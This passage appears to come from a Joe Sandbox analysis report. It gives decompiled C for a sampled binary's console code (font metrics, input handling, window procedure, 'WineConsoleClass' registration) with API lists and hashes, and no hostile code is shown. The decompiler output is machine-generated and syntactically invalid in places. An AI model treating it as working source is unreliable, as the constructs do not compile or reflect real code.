                                                  						_v52 = 0;
                                                  						if(_v12 != 0) {
                                                  							0x400000("input restore failed: %#lx\n", _v12);
                                                  						}
                                                  					}
                                                  					CloseHandle( *(_v8 + 0xac));
                                                  					 *(_v8 + 0xac) = 0;
                                                  					LeaveCriticalSection(0x41f57c);
                                                  					return 0;
                                                  					L7:
                                                  					if(_v12 == 0) {
                                                  						EnterCriticalSection(0x41f57c);
                                                  						if( *((intOrPtr*)(_v8 + 0x1c)) == 0) {
                                                  							_v32 = 0;
                                                  						} else {
                                                  							_v32 = 1;
                                                  						}
                                                  						_t96 = _v32;
                                                  						_v44 = _t96;
                                                  						0x400000( &_v12348);
                                                  						_v36 = MultiByteToWideChar(E004042F0(_v56, _v8), 0,  &_v4156, _v56,  &_v12348, _t96);
                                                  						_v16 = 0;
                                                  						while(_v16 < _v36) {
                                                  							_v20 =  *((intOrPtr*)(_t145 + _v16 * 2 - 0x3038));
                                                  							_v24 = _v20 & 0x0000ffff;
                                                  							_v24 = _v24 - 3;
                                                  							if(_v24 > 0x7c) {
                                                  								L22:
                                                  								E00402130(_v20 & 0x0000ffff, _v8, _v20 & 0x0000ffff, 0);
                                                  								L23:
                                                  								_v16 = _v16 + 1;
                                                  								continue;
                                                  							}
                                                  							_t50 = _v24 + 0x4073a4; // 0xcccccc04
                                                  							switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M0040738C))) {
                                                  								case 0:
                                                  									LeaveCriticalSection(0x41f57c);
                                                  									goto L31;
                                                  								case 1:
                                                  									__eax = _v20 & 0x0000ffff;
                                                  									__ecx = _v8;
                                                  									__eax = E00404980(__edi, _v8, _v20 & 0x0000ffff, 0x48, 8);
                                                  									goto L23;
                                                  								case 2:
                                                  									__eax = E00404980(__edi, _v8, 0xa, 0xd, 8);
                                                  									goto L23;
                                                  								case 3:
                                                  									__eax = _v16;
                                                  									__ecx = __ebp + _v16 * 2 - 0x3036;
                                                  									__eax = E00405910(__edi, _v8, __ebp + _v16 * 2 - 0x3036, _v36 - _v16 - 1);
                                                  									_v16 = __eax;
                                                  									goto L23;
                                                  								case 4:
                                                  									_v8 = E00404980(__edi, _v8, 8, 8, 0);
                                                  									goto L23;
                                                  								case 5:
                                                  									goto L22;
                                                  							}
                                                  						}
                                                  						E00405270(_t144, _v8);
                                                  						if(_v44 == 0 &&  *((intOrPtr*)(_v8 + 0x1c)) != 0) {
                                                  							if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                  								_v40 = 0;
                                                  							} else {
                                                  								_v40 = 1;
                                                  							}
                                                  							0x400000(_v40);
                                                  							E00405A20(_v8, 0, 0, 0, 1);
                                                  						}
                                                  						LeaveCriticalSection(0x41f57c);
                                                  						continue;
                                                  					}
                                                  					goto L31;
                                                  				}
                                                  			}

























                                                  APIs
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040711A
                                                  • EnterCriticalSection.KERNEL32(0041F57C), ref: 00407185
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 004071D5
                                                  • LeaveCriticalSection.KERNEL32(0041F57C), ref: 00407237
                                                  • EnterCriticalSection.KERNEL32(0041F57C,?,?,?), ref: 00407313
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00407363
                                                  • LeaveCriticalSection.KERNEL32(0041F57C), ref: 0040737B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ByteCharCloseCreateEventHandleMultiWide
                                                  • String ID: input restore failed: %#lx$input setup failed: %#lx$|
                                                  • API String ID: 3901266932-1979639224
                                                  • Opcode ID: dcac3e968452032e06e2bfb821b349b70bf670fe9cc7e7c651863d96417f59cf
                                                  • Instruction ID: d33cacd45055db96662674f4638ee13e701fdda32b95d152c692fed5d35c07b2
                                                  • Opcode Fuzzy Hash: dcac3e968452032e06e2bfb821b349b70bf670fe9cc7e7c651863d96417f59cf
                                                  • Instruction Fuzzy Hash: BD815C70E44208FBDB10DF94C946BEEB7B5BB48704F2081AAF5017A2C0C7786A85DF5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E00406360(intOrPtr _a4, LOGFONTW* _a8) {
                                                  				short* _v8;
                                                  				struct HDC__* _v12;
                                                  				short** _v16;
                                                  				short _v18;
                                                  				struct HFONT__* _v24;
                                                  				short** _v28;
                                                  				signed int _v32;
                                                  				intOrPtr _v36;
                                                  				void* _v40;
                                                  				struct tagTEXTMETRICW _v100;
                                                  				struct _cpinfo _v120;
                                                  				short _v184;
                                                  				int _t132;
                                                  				intOrPtr _t177;
                                                  				void* _t247;
                                                  
                                                  				_v8 =  *((intOrPtr*)(_a4 + 8)) + 0x80;
                                                  				if( *( *((intOrPtr*)(_a4 + 0x84)) + 8) == 0 || _a8->lfHeight !=  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x82)) || _a8->lfWeight !=  *((short*)( *((intOrPtr*)(_a4 + 8)) + 0x84)) || (_a8->lfItalic & 0x000000ff) != 0 || (_a8->lfUnderline & 0x000000ff) != 0 || (_a8->lfStrikeOut & 0x000000ff) != 0) {
                                                  					L11:
                                                  					_v12 = GetDC( *(_a4 + 0xa8));
                                                  					if(_v12 != 0) {
                                                  						_v24 = CreateFontIndirectW(_a8);
                                                  						if(_v24 != 0) {
                                                  							_v40 = SelectObject(_v12, _v24);
                                                  							_t132 = GetTextMetricsW(_v12,  &_v100);
                                                  							0x400000( &_v184);
                                                  							 *(_v8 + 0xc) = GetTextFaceW(_v12, _t132,  &_v184) - 1;
                                                  							SelectObject(_v12, _v40);
                                                  							ReleaseDC( *(_a4 + 0xa8), _v12);
                                                  							 *_v8 = _v100.tmAveCharWidth;
                                                  							 *((short*)(_v8 + 2)) = _v100.tmHeight + _v100.tmExternalLeading;
                                                  							 *(_v8 + 6) = _v100.tmPitchAndFamily & 0x000000ff;
                                                  							 *((short*)(_v8 + 4)) = _v100.tmWeight;
                                                  							E0040DBEB( *((intOrPtr*)(_v8 + 8)));
                                                  							_push( *(_v8 + 0xc) << 1);
                                                  							 *((intOrPtr*)(_v8 + 8)) = E0040DC06();
                                                  							E0040CC90( *((intOrPtr*)(_v8 + 8)),  &_v184,  *(_v8 + 0xc) << 1);
                                                  							if(GetCPInfo( *(_a4 + 0xa4),  &_v120) != 0 && _v120 == 2) {
                                                  								 *_v8 = _v100.tmMaxCharWidth;
                                                  							}
                                                  							if( *( *((intOrPtr*)(_a4 + 0x84)) + 8) != 0) {
                                                  								DeleteObject( *( *((intOrPtr*)(_a4 + 0x84)) + 8));
                                                  							}
                                                  							 *( *((intOrPtr*)(_a4 + 0x84)) + 8) = _v24;
                                                  							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x28)) = _v100.tmExternalLeading;
                                                  							if( *( *((intOrPtr*)(_a4 + 0x84)) + 4) != 0) {
                                                  								DeleteObject( *( *((intOrPtr*)(_a4 + 0x84)) + 4));
                                                  								 *( *((intOrPtr*)(_a4 + 0x84)) + 4) = 0;
                                                  							}
                                                  							return 1;
                                                  						}
                                                  						ReleaseDC( *(_a4 + 0xa8), _v12);
                                                  						return 0;
                                                  					}
                                                  					return 0;
                                                  				} else {
                                                  					_v16 =  &(_a8->lfFaceName);
                                                  					_v28 =  &(_v16[0]);
                                                  					do {
                                                  						_v18 =  *_v16;
                                                  						_v16 =  &(_v16[0]);
                                                  					} while (_v18 != 0);
                                                  					_v32 = _v16 - _v28 >> 1;
                                                  					if( *( *((intOrPtr*)(_a4 + 8)) + 0x8c) != _v32) {
                                                  						goto L11;
                                                  					}
                                                  					_t177 = E0040B504( &(_a8->lfFaceName),  *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) + 0x88)),  *( *((intOrPtr*)(_a4 + 8)) + 0x8c) << 1);
                                                  					_t247 = _t247 + 0xc;
                                                  					_v36 = _t177;
                                                  					if(_v36 != 0) {
                                                  						goto L11;
                                                  					}
                                                  					return 1;
                                                  				}
                                                  			}



















                                                  APIs
                                                  • _memcmp.LIBVCRUNTIME ref: 0040644F
                                                  • GetDC.USER32(?), ref: 00406474
                                                  • CreateFontIndirectW.GDI32(?), ref: 0040648E
                                                  • ReleaseDC.USER32 ref: 004064AB
                                                  • SelectObject.GDI32(00000000,00000000), ref: 004064C0
                                                  • GetTextMetricsW.GDI32(00000000,?), ref: 004064D1
                                                  • GetTextFaceW.GDI32(00000000,00000000), ref: 004064EF
                                                  • SelectObject.GDI32(00000000,?), ref: 00406506
                                                  • ReleaseDC.USER32 ref: 0040651A
                                                  • GetCPInfo.KERNEL32(?,?), ref: 004065A1
                                                  • DeleteObject.GDI32(00000000), ref: 004065D7
                                                  • DeleteObject.GDI32(00000000), ref: 00406617
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Object$DeleteReleaseSelectText$CreateFaceFontIndirectInfoMetrics_memcmp
                                                  • String ID:
                                                  • API String ID: 2694252524-0
                                                  • Opcode ID: d4a34128d0532f5ebc41287738e253f722d3f1e51ca31ee86009d61d125bde91
                                                  • Instruction ID: b9d7ba42646ab805e7765de740b74645fab4472f4a04deea8d5b249da7b72549
                                                  • Opcode Fuzzy Hash: d4a34128d0532f5ebc41287738e253f722d3f1e51ca31ee86009d61d125bde91
                                                  • Instruction Fuzzy Hash: A2A1E974A00209EFCB04CF94C594AAEB7B5FF48314F15C2A9E949AB341DB35EE85CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E004046F0(void* __edi, void* _a4) {
                                                  				signed int _v8;
                                                  				intOrPtr* _v12;
                                                  				short _v14;
                                                  				signed int _v20;
                                                  				intOrPtr _v24;
                                                  				signed int _v28;
                                                  				intOrPtr _v32;
                                                  				signed int _v36;
                                                  				struct _WNDCLASSW _v76;
                                                  				struct _STARTUPINFOW _v144;
                                                  				void* _v176;
                                                  				intOrPtr _v268;
                                                  				intOrPtr _v272;
                                                  				intOrPtr _v300;
                                                  				char _v380;
                                                  				void* _t170;
                                                  				void* _t171;
                                                  
                                                  				_t170 = __edi;
                                                  				 *((intOrPtr*)(_a4 + 0x84)) = 0x420f78;
                                                  				if(TranslateCharsetInfo(GetACP(),  &_v176, 2) != 0) {
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x20)) = _v176;
                                                  					GetStartupInfoW( &_v144);
                                                  					if(_v144.lpTitle == 0) {
                                                  						L15:
                                                  						E00404B80( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)),  &_v380);
                                                  						if((_v144.dwFlags & 0x00000008) != 0) {
                                                  							_v272 = _v144.dwXCountChars;
                                                  							_v268 = _v144.dwYCountChars;
                                                  						}
                                                  						if((_v144.dwFlags & 0x00000010) != 0) {
                                                  							_v300 = _v144.dwFillAttribute;
                                                  						}
                                                  						_v76.style = 8;
                                                  						_v76.lpfnWndProc = E00408790;
                                                  						_v76.cbClsExtra = 0;
                                                  						_v76.cbWndExtra = 4;
                                                  						_v76.hInstance = GetModuleHandleW(0);
                                                  						_v76.hIcon = LoadIconW(0, 0x7f05);
                                                  						_v76.hCursor = LoadCursorW(0, 0x7f00);
                                                  						_v76.hbrBackground = GetStockObject(4);
                                                  						_v76.lpszMenuName = 0;
                                                  						_v76.lpszClassName = L"WineConsoleClass";
                                                  						RegisterClassW( &_v76);
                                                  						if(CreateWindowExW(0, _v76.lpszClassName, 0, 0xff0000, 0x80000000, 0x80000000, 0, 0, 0, 0, _v76.hInstance, _a4) != 0) {
                                                  							if(( *(_t171 + 0xffffffffffffff14) & 0x0000ffff) == 0) {
                                                  								E00406790(_t170, _a4,  &_v380);
                                                  							}
                                                  							E00401CB0(_a4,  &_v380);
                                                  							return 1;
                                                  						} else {
                                                  							return 0;
                                                  						}
                                                  					}
                                                  					_v12 = _v144.lpTitle;
                                                  					_v32 = _v12 + 2;
                                                  					do {
                                                  						_v14 =  *_v12;
                                                  						_v12 = _v12 + 2;
                                                  					} while (_v14 != 0);
                                                  					_v36 = _v12 - _v32 >> 1;
                                                  					_v20 = _v36;
                                                  					_push(_v20 + _v20 + 2);
                                                  					_v24 = E0040DC06();
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)) = _v24;
                                                  					if(_v24 != 0) {
                                                  						_v8 = 0;
                                                  						while(_v8 < _v20) {
                                                  							if(( *(_v144.lpTitle + _v8 * 2) & 0x0000ffff) != 0x5c) {
                                                  								_v28 =  *(_v144.lpTitle + _v8 * 2) & 0x0000ffff;
                                                  							} else {
                                                  								_v28 = 0x5f;
                                                  							}
                                                  							 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)) + _v8 * 2)) = _v28;
                                                  							_v8 = _v8 + 1;
                                                  						}
                                                  						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24)) + _v20 * 2)) = 0;
                                                  						goto L15;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}





















                                                  APIs
                                                  • GetACP.KERNEL32(?,00000002), ref: 0040470F
                                                  • TranslateCharsetInfo.GDI32(00000000), ref: 00404716
                                                  • GetStartupInfoW.KERNEL32(?), ref: 00404740
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Info$CharsetStartupTranslate
                                                  • String ID: _
                                                  • API String ID: 3822699805-701932520
                                                  • Opcode ID: 8e78b50df1e67cab56e8d9dab4517ea9b7649776dc4ede3edf63efa29e8267e4
                                                  • Instruction ID: 21d27d1c2dd65001b37253adb57114a482a244c2a073b6c0f5737e405ff2358a
                                                  • Opcode Fuzzy Hash: 8e78b50df1e67cab56e8d9dab4517ea9b7649776dc4ede3edf63efa29e8267e4
                                                  • Instruction Fuzzy Hash: F67121B4A00209DFDB14DF94C985BEEBBB1FF48704F108169EA05AB391DB74A941CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00408790(void* __edi, int _a4, int _a8, signed int _a12, signed int _a16) {
                                                  				long _v8;
                                                  				signed int _v12;
                                                  				int _v16;
                                                  				signed int _v20;
                                                  				void _v24;
                                                  				signed int _v28;
                                                  				int _v32;
                                                  				struct HBITMAP__* _v36;
                                                  				struct HBITMAP__* _v40;
                                                  				signed int _v44;
                                                  				int _v48;
                                                  				int _v52;
                                                  				int _v56;
                                                  				signed int _v60;
                                                  				int _v64;
                                                  				struct HBITMAP__* _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				int _v80;
                                                  				signed int _v84;
                                                  				int _v88;
                                                  				signed int _v92;
                                                  				struct tagPOINT _v100;
                                                  				struct tagPAINTSTRUCT _v164;
                                                  				int _t570;
                                                  				long _t573;
                                                  				long _t602;
                                                  				long _t637;
                                                  
                                                  				_v8 = GetWindowLongW(_a4, 0);
                                                  				_v16 = _a8;
                                                  				if(_v16 > 0xf) {
                                                  					if(_v16 > 0x111) {
                                                  						if(_v16 > 0x401) {
                                                  							L177:
                                                  							return DefWindowProcW(_a4, _a8, _a12, _a16);
                                                  						}
                                                  						if(_v16 == 0x401) {
                                                  							L15:
                                                  							_t602 = _v8;
                                                  							__eflags =  *(_t602 + 0x84);
                                                  							if( *(_t602 + 0x84) != 0) {
                                                  								_t570 =  *(_v8 + 0x84);
                                                  								__eflags =  *((intOrPtr*)(_t570 + 0x64)) - 1;
                                                  								if( *((intOrPtr*)(_t570 + 0x64)) == 1) {
                                                  									E00407B50(_v8);
                                                  								}
                                                  							}
                                                  							L178:
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						_v16 = _v16 - 0x112;
                                                  						if(_v16 > 0xf8) {
                                                  							goto L177;
                                                  						}
                                                  						_t28 = _v16 + 0x4095b4; // 0x1f0f0b
                                                  						switch( *((intOrPtr*)(( *_t28 & 0x000000ff) * 4 +  &M00409580))) {
                                                  							case 0:
                                                  								__ecx = _v8;
                                                  								__eflags =  *(__ecx + 0x84);
                                                  								if( *(__ecx + 0x84) != 0) {
                                                  									__edx = _a12;
                                                  									_v92 = _a12;
                                                  									__eflags = _v92 - 0x101;
                                                  									if(_v92 == 0x101) {
                                                  										_v8 = E004024C0(_v8, 0);
                                                  										L157:
                                                  										goto L178;
                                                  									}
                                                  									__eflags = _v92 - 0x102;
                                                  									if(_v92 == 0x102) {
                                                  										__ecx = _v8;
                                                  										__eax = E004024C0(_v8, 1);
                                                  										goto L157;
                                                  									}
                                                  									__edx = _a16;
                                                  									__eax = _a12;
                                                  									__ecx = _a8;
                                                  									__edx = _a4;
                                                  									return DefWindowProcW(_a4, _a8, _a12, _a16);
                                                  								}
                                                  								goto L178;
                                                  							case 1:
                                                  								goto L15;
                                                  							case 2:
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 8);
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 8);
                                                  								 *(0x78 +  *(_v8 + 8)) =  *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70);
                                                  								__eax =  *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70) + 1;
                                                  								_v32 =  *(0x78 +  *(_v8 + 8)) -  *( *(_v8 + 8) + 0x70) + 1;
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 8);
                                                  								__eax =  *(__edx + 0x70);
                                                  								_v20 =  *(__edx + 0x70);
                                                  								__ecx = _v8;
                                                  								__eflags =  *(__ecx + 0x84);
                                                  								if( *(__ecx + 0x84) != 0) {
                                                  									_a12 = _a12 & 0x0000ffff;
                                                  									__eax = __dx & 0x0000ffff;
                                                  									_v60 = __dx & 0x0000ffff;
                                                  									__eflags = _v60 - 5;
                                                  									if(_v60 > 5) {
                                                  										L112:
                                                  										__eflags = _v20;
                                                  										if(_v20 <= 0) {
                                                  											_v64 = 0;
                                                  										} else {
                                                  											__edx = _v20;
                                                  											_v64 = _v20;
                                                  										}
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 8);
                                                  										 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(__ecx + 0xc)) - _v32;
                                                  										__eflags = _v64 -  *((intOrPtr*)(__ecx + 0xc)) - _v32;
                                                  										if(_v64 >=  *((intOrPtr*)(__ecx + 0xc)) - _v32) {
                                                  											__edx = _v8;
                                                  											__eax =  *(_v8 + 8);
                                                  											__ecx =  *(__eax + 0xc);
                                                  											__ecx =  *(__eax + 0xc) - _v32;
                                                  											__eflags = __ecx;
                                                  											_v72 = __ecx;
                                                  										} else {
                                                  											__eflags = _v20;
                                                  											if(_v20 <= 0) {
                                                  												_v68 = 0;
                                                  											} else {
                                                  												__eax = _v20;
                                                  												_v68 = _v20;
                                                  											}
                                                  											__ecx = _v68;
                                                  											_v72 = _v68;
                                                  										}
                                                  										__edx = _v72;
                                                  										_v20 = _v72;
                                                  										__eax = _v8;
                                                  										__ecx =  *(_v8 + 8);
                                                  										__edx = _v20;
                                                  										__eflags = _v20 -  *((intOrPtr*)(__ecx + 0x70));
                                                  										if(_v20 !=  *((intOrPtr*)(__ecx + 0x70))) {
                                                  											__eax = _v8;
                                                  											__ecx =  *(_v8 + 8);
                                                  											__edx = _v20;
                                                  											 *( *(_v8 + 8) + 0x70) = _v20;
                                                  											__eax = _v32;
                                                  											__ecx = _v20;
                                                  											_t377 = __eax - 1; // -1
                                                  											__edx = _v20 + _t377;
                                                  											__eax = _v8;
                                                  											__ecx =  *(_v8 + 8);
                                                  											 *(0x78 +  *(_v8 + 8)) = _v20 + _t377;
                                                  											__edx = _v8;
                                                  											__eax = E00407B50(_v8);
                                                  										}
                                                  										goto L178;
                                                  									}
                                                  									__ecx = _v60;
                                                  									switch( *((intOrPtr*)(_v60 * 4 +  &M004096B0))) {
                                                  										case 0:
                                                  											_v20 = _v20 - 1;
                                                  											_v20 = _v20 - 1;
                                                  											goto L112;
                                                  										case 1:
                                                  											_v20 = _v20 + 1;
                                                  											_v20 = _v20 + 1;
                                                  											goto L112;
                                                  										case 2:
                                                  											_v20 = _v20 - 8;
                                                  											_v20 = _v20 - 8;
                                                  											goto L112;
                                                  										case 3:
                                                  											_v20 = _v20 + 8;
                                                  											_v20 = _v20 + 8;
                                                  											goto L112;
                                                  										case 4:
                                                  											goto L112;
                                                  										case 5:
                                                  											_a12 = _a12 >> 0x10;
                                                  											__eax = _a12 >> 0x00000010 & 0x0000ffff;
                                                  											__eflags = _a12 >> 0x00000010 & 0x0000ffff;
                                                  											__ecx = __ax & 0x0000ffff;
                                                  											_v20 = __ax & 0x0000ffff;
                                                  											goto L112;
                                                  									}
                                                  								}
                                                  								goto L178;
                                                  							case 3:
                                                  								L126:
                                                  								__edx = _v8;
                                                  								__eax =  *(_v8 + 8);
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 8);
                                                  								 *( *(_v8 + 8) + 0x7c) =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74);
                                                  								__eax =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1;
                                                  								_v36 =  *( *(_v8 + 8) + 0x7c) -  *( *(_v8 + 8) + 0x74) + 1;
                                                  								__ecx = _v8;
                                                  								__edx =  *(_v8 + 8);
                                                  								__eax =  *(__edx + 0x74);
                                                  								_v12 =  *(__edx + 0x74);
                                                  								__ecx = _v8;
                                                  								__eflags =  *(__ecx + 0x84);
                                                  								if( *(__ecx + 0x84) != 0) {
                                                  									__eflags = _a8 - 0x20a;
                                                  									if(_a8 != 0x20a) {
                                                  										_a12 = _a12 & 0x0000ffff;
                                                  										__ecx = __ax & 0x0000ffff;
                                                  										_v76 = __ax & 0x0000ffff;
                                                  										__eflags = _v76 - 5;
                                                  										if(_v76 > 5) {
                                                  											L137:
                                                  											__eflags = _v12;
                                                  											if(_v12 <= 0) {
                                                  												_v80 = 0;
                                                  											} else {
                                                  												__eax = _v12;
                                                  												_v80 = _v12;
                                                  											}
                                                  											__ecx = _v8;
                                                  											__edx =  *(_v8 + 8);
                                                  											 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) - _v36;
                                                  											__eflags = _v80 -  *((intOrPtr*)(__edx + 0x10)) - _v36;
                                                  											if(_v80 >=  *((intOrPtr*)(__edx + 0x10)) - _v36) {
                                                  												__eax = _v8;
                                                  												__ecx =  *(_v8 + 8);
                                                  												__edx =  *(__ecx + 0x10);
                                                  												__edx =  *(__ecx + 0x10) - _v36;
                                                  												__eflags = __edx;
                                                  												_v88 = __edx;
                                                  											} else {
                                                  												__eflags = _v12;
                                                  												if(_v12 <= 0) {
                                                  													_v84 = 0;
                                                  												} else {
                                                  													__ecx = _v12;
                                                  													_v84 = _v12;
                                                  												}
                                                  												__edx = _v84;
                                                  												_v88 = _v84;
                                                  											}
                                                  											__eax = _v88;
                                                  											_v12 = _v88;
                                                  											__ecx = _v8;
                                                  											__edx =  *(_v8 + 8);
                                                  											__eax = _v12;
                                                  											__eflags = _v12 -  *(__edx + 0x74);
                                                  											if(_v12 !=  *(__edx + 0x74)) {
                                                  												__ecx = _v8;
                                                  												__edx =  *(_v8 + 8);
                                                  												__eax = _v12;
                                                  												 *( *(_v8 + 8) + 0x74) = _v12;
                                                  												__ecx = _v36;
                                                  												__edx = _v12;
                                                  												_t470 = __ecx - 1; // -1
                                                  												__eax = _v12 + _t470;
                                                  												__ecx = _v8;
                                                  												__edx =  *(_v8 + 8);
                                                  												 *( *(_v8 + 8) + 0x7c) = _v12 + _t470;
                                                  												_v8 = E00407B50(_v8);
                                                  											}
                                                  											goto L178;
                                                  										}
                                                  										__edx = _v76;
                                                  										switch( *((intOrPtr*)(_v76 * 4 +  &M004096C8))) {
                                                  											case 0:
                                                  												_v12 = _v12 - 1;
                                                  												_v12 = _v12 - 1;
                                                  												goto L137;
                                                  											case 1:
                                                  												_v12 = _v12 + 1;
                                                  												_v12 = _v12 + 1;
                                                  												goto L137;
                                                  											case 2:
                                                  												_v12 = _v12 - 8;
                                                  												_v12 = _v12 - 8;
                                                  												goto L137;
                                                  											case 3:
                                                  												_v12 = _v12 + 8;
                                                  												_v12 = _v12 + 8;
                                                  												goto L137;
                                                  											case 4:
                                                  												goto L137;
                                                  											case 5:
                                                  												_a12 = _a12 >> 0x10;
                                                  												__ecx = _a12 >> 0x00000010 & 0x0000ffff;
                                                  												__eflags = _a12 >> 0x00000010 & 0x0000ffff;
                                                  												__edx = __cx & 0x0000ffff;
                                                  												_v12 = __cx & 0x0000ffff;
                                                  												goto L137;
                                                  										}
                                                  									}
                                                  									_v24 = 3;
                                                  									__edx =  &_v24;
                                                  									SystemParametersInfoW(0x68, 0,  &_v24, 0) = _a12;
                                                  									__eax = _a12 >> 0x10;
                                                  									__eax = _a12 >> 0x00000010 & 0x0000ffff;
                                                  									__ax = __eax;
                                                  									__eax =  ~__eax;
                                                  									asm("cdq");
                                                  									__ecx = 0x78;
                                                  									_t413 = __eax % 0x78;
                                                  									__eax = __eax / 0x78;
                                                  									__edx = _t413;
                                                  									_v24 = __eax;
                                                  									_v12 = _v12 + _v24;
                                                  									_v12 = _v12 + _v24;
                                                  									goto L137;
                                                  								}
                                                  								goto L178;
                                                  							case 4:
                                                  								__ecx = _v8;
                                                  								__eflags =  *(__ecx + 0x84);
                                                  								if( *(__ecx + 0x84) == 0) {
                                                  									L175:
                                                  									__ecx = _a16;
                                                  									__edx = _a12;
                                                  									__eax = _a8;
                                                  									__ecx = _a4;
                                                  									return DefWindowProcW(_a4, _a8, _a12, _a16);
                                                  								}
                                                  								_a16 = _a16 >> 0x10;
                                                  								__edx = _a16 >> 0x00000010 & 0x0000ffff;
                                                  								__eax = __dx & 0x0000ffff;
                                                  								__eflags = __dx & 0x0000ffff;
                                                  								if((__dx & 0x0000ffff) != 0) {
                                                  									__edx = _v8;
                                                  									 *(__edx + 0xa8) = GetSystemMenu( *(__edx + 0xa8), 0);
                                                  									__ecx = _v8;
                                                  									__eax = E00406910(_v8, __eax);
                                                  									goto L178;
                                                  								}
                                                  								goto L175;
                                                  							case 5:
                                                  								__edx = _v8;
                                                  								__eflags =  *(__edx + 0x84);
                                                  								if( *(__edx + 0x84) == 0) {
                                                  									L67:
                                                  									__edx = _a12;
                                                  									__eax = _a16;
                                                  									__ecx = _v8;
                                                  									__eax = E00403F70(_v8, _v8, _a16);
                                                  									__edx = _v8;
                                                  									__eax = E00405B90(__edi, _v8, __eax, _a12, 1);
                                                  									L68:
                                                  									goto L178;
                                                  								}
                                                  								__eax = _v8;
                                                  								__ecx =  *(_v8 + 0x84);
                                                  								__eflags =  *(__ecx + 0x2c);
                                                  								if( *(__ecx + 0x2c) != 0) {
                                                  									L62:
                                                  									__eax = GetCapture();
                                                  									__ecx = _v8;
                                                  									__eflags = __eax -  *((intOrPtr*)(__ecx + 0xa8));
                                                  									if(__eax ==  *((intOrPtr*)(__ecx + 0xa8))) {
                                                  										__edx = _v8;
                                                  										__eax =  *(_v8 + 0x84);
                                                  										__eflags =  *(__eax + 0x14);
                                                  										if( *(__eax + 0x14) != 0) {
                                                  											__ecx = _a12;
                                                  											__ecx = _a12 & 0x00000001;
                                                  											__eflags = __ecx;
                                                  											if(__ecx != 0) {
                                                  												__edx = _a16;
                                                  												__eax = _v8;
                                                  												_push(E00403F70(__ecx, _v8, _a16));
                                                  												__ecx = _v8;
                                                  												__edx =  *(_v8 + 0x84);
